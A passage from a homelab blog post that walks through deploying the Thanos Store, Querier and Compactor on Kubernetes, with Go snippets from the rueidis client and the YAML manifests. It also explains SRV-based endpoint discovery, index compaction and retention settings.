</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// CacheSizeEachConn is redis client side cache size that bind to each TCP connection to a single redis instance.</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// The default is DefaultCacheBytes.</span>
</span></span><span style="display:flex;"><span>	<span style="color:#a6e22e">CacheSizeEachConn</span> <span style="color:#66d9ef">int</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And then I finally found the default value and figured out what the unit was
<a href="https://github.com/redis/rueidis/blob/84ae736a8812099d841cd68e4b6b502de08c7a37/rueidis.go#L21">here</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span><span style="color:#66d9ef">const</span> (
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// DefaultCacheBytes is the default value of ClientOption.CacheSizeEachConn, which is 128 MiB</span>
</span></span><span style="display:flex;"><span>	<span style="color:#a6e22e">DefaultCacheBytes</span> = <span style="color:#ae81ff">128</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">20</span>)
</span></span></code></pre></div><p>And all of that sleuthing just to realize that the value takes any unit I want.
&#x1f926;</p>
<p>Ah well. At least I got to look at some Go code again. All of that said, the
Store also needs a bit of local disk space as scratch space for temporarily
downloaded chunks and indexes. I gave it a 5 GiB volume, and that has been more
than enough for the couple of weeks I&rsquo;ve had the setup running.</p>
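<p>The PVC behind that scratch volume isn&rsquo;t particularly interesting. A minimal sketch
might look like this; the claim name matches what the Deployment below references,
while the storage class is an assumption standing in for whichever Ceph RBD class is in use:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: thanos-store-volume
spec:
  accessModes:
    - ReadWriteOnce
  # Assumption: substitute the Ceph RBD storage class of your cluster.
  storageClassName: rbd-fast
  resources:
    requests:
      storage: 5Gi
</code></pre>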
<p>The deployment of the Store then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/redis-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/redis-cache-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">store</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">cache-index-header</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">chunk-pool-size=1GB</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">data-dir={{ .Values.store.cacheDir }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">index-cache.config-file=/homelab/thanos-store/configs/redis-cache.yaml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">objstore.config-file=/homelab/thanos-store/configs/bucket-config.yml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">web.disable</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">grpc-address=0.0.0.0:{{ .Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.store.cacheDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-configs</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/homelab/thanos-store/configs</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">store-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">store-grpc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">thanos-store-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-configs</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">projected</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">sources</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;bucket.yml&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">bucket-config.yml</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">redis-cache-conf</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;redis-cache.yaml&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">redis-cache.yaml</span>
</span></span></code></pre></div><p>Nothing special to see here, so let&rsquo;s move on to the next piece of the puzzle.
At this point, the upload of the older blocks was done, so I removed the
<code>shipper.upload-compacted</code> flag from the <code>additionalArgs</code> of the
Thanos Sidecar config. I still left my five-year retention in Prometheus in place
for now, because I hadn&rsquo;t tested anything related to Thanos yet.</p>
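<p>For completeness, while the one-off upload was running, that flag lived in the Thanos
section of my kube-prometheus-stack values, roughly along these lines. This is a sketch
assuming the prometheus-operator <code>Argument</code> list format for <code>additionalArgs</code>,
not a verbatim copy of my values file:</p>
<pre tabindex="0"><code>prometheus:
  prometheusSpec:
    thanos:
      additionalArgs:
        # Boolean flag, so no value is needed. Removed again once the
        # initial upload of the already compacted blocks was done.
        - name: shipper.upload-compacted
</code></pre>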
<p>That&rsquo;s coming now, with the deployment of the Querier. That&rsquo;s the component that
connects to a number of metrics stores, which can be Thanos Store instances or
Thanos Sidecars on multiple Prometheus instances, and queries them for data. It
implements the Prometheus query language, so it&rsquo;s fully compatible with frontends
like Grafana.</p>
<p>It&rsquo;s also not very complicated to deploy, as it doesn&rsquo;t need any local storage,
for example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">query</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">query.auto-downsampling</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">grpc-address=0.0.0.0:{{ .Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">endpoint=dnssrv+_thanos-store-grpc._tcp.thanos-store.monitoring.svc</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">endpoint=dnssrv+_grpc._tcp.monitoring-kube-prometheus-thanos-discovery.monitoring.svc</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">512Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">querier-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">querier-grpc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>The only thing to note is the configuration of the endpoints. There are a number
of options. I decided to configure them via DNS, using the records of the
Store and Sidecar Services, which worked nicely. Note that I was even able to
use SRV queries, so I didn&rsquo;t need to hardcode the ports either. Honestly, more
things ought to support SRV queries. The two <code>--endpoint</code> flags tell the Querier
to request data from my Sidecar and Thanos Store deployments.
This means that for older data, the Querier will take it from the Store, and for
the most current data (the past 2h at most in my config) it will go to the Sidecar,
which in turn will query Prometheus itself.</p>
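<p>For the SRV lookup to work, the Store needs a Service whose name and named gRPC port
match the <code>_thanos-store-grpc._tcp.thanos-store</code> part of the endpoint string.
A rough sketch, mirroring the Compactor Service shown further down; the HTTP port is an
assumption and only the gRPC port matters for the Querier:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Service
metadata:
  name: thanos-store
spec:
  type: ClusterIP
  selector:
    homelab/app: thanos-store
  ports:
    - name: thanos-store-grpc
      port: {{ .Values.ports.grpcPort }}
      targetPort: store-grpc
      protocol: TCP
    # Assumption: the HTTP port is exposed as well, e.g. for metrics scraping.
    - name: thanos-store-http
      port: {{ .Values.ports.httpPort }}
      targetPort: store-http
      protocol: TCP
</code></pre>
<p>A plain ClusterIP Service gets one SRV record per named port pointing at the cluster IP;
a headless Service would also work and would let the SRV lookup return individual Pod
addresses instead.</p>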
<p>The last Thanos component to be deployed was the Compactor. Its job is to take
the raw blocks uploaded to the bucket by the Sidecar and compact them. That
doesn&rsquo;t reduce the size of the actual samples at all, because they&rsquo;re all kept,
but it does reduce the size of the index, as duplicate entries for the same
series in different blocks can be combined. As an example of the current
situation, I&rsquo;ve got a couple of 2h blocks where the index takes up around 14.2 MiB.
But the already compacted 8h block right before those has an index of 29.2 MiB.
Without compaction, the four 2h blocks making up the 8h block would take a total
of 4x14.2=56.8 MiB, instead of 29.2 MiB.</p>
<p>The Compactor does not need to be kept running all of the time; it could be
deployed as a CronJob, as it can just do its thing and then shut down again. It
only interacts with the rest of the system by downloading blocks from the S3
bucket, working on them, uploading the result and possibly deleting some now
unneeded blocks. But I decided to run it as a Deployment, because I figured that
I would need to keep the resources free for its regular run anyway, so why not
just keep it running?</p>
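<p>For anyone who prefers the CronJob route, a one-shot run could look roughly like this.
This is just a sketch of the alternative, not what I deployed; without <code>--wait</code>
the Compactor does a single pass and exits, and the schedule and image tag are placeholders:</p>
<pre tabindex="0"><code>apiVersion: batch/v1
kind: CronJob
metadata:
  name: thanos-compactor
spec:
  schedule: "0 */6 * * *"     # arbitrary example schedule
  concurrencyPolicy: Forbid   # only one Compactor may work on the bucket at a time
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: Never
          containers:
            - name: thanos-compactor
              image: quay.io/thanos/thanos:v0.38.0   # placeholder tag
              args:
                - compact
                - --data-dir=/scratch
                - --objstore.config-file=/etc/thanos/bucket.yml
              volumeMounts:
                - name: scratch
                  mountPath: /scratch
                - name: objectstore-conf
                  mountPath: /etc/thanos
                  readOnly: true
          volumes:
            - name: scratch
              persistentVolumeClaim:
                claimName: thanos-compactor-volume
            - name: objectstore-conf
              secret:
                secretName: thanos-objectstore-config
</code></pre>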
<p>This is what the deployment looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/objectstore-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/thanos-objectstore-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">compact</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">wait</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">wait-interval=30m</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-1h=0d</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-5m=5y</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-raw=2y</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">data-dir={{ .Values.compactor.scratchDir }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">objstore.config-file={{ .Values.compactor.configDir }}/bucket.yml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">disable-admin-operations</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.compactor.scratchDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">objectstore-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.compactor.configDir }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">compactor-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">thanos-compactor-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">objectstore-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretName</span>: <span style="color:#e6db74">&#34;thanos-objectstore-config&#34;</span>
</span></span></code></pre></div><p>The interesting part here is the command line flags. The <code>--wait</code> and <code>--wait-interval</code>
flags configure the Compactor to keep running, and to execute its tasks every
30 minutes. I&rsquo;m also configuring retention. On Prometheus itself, I&rsquo;ve got five
years&rsquo; worth of retention configured. The end of that period will only be reached in
February next year, as I initially set up Prometheus in 2021. But as I&rsquo;ve noted
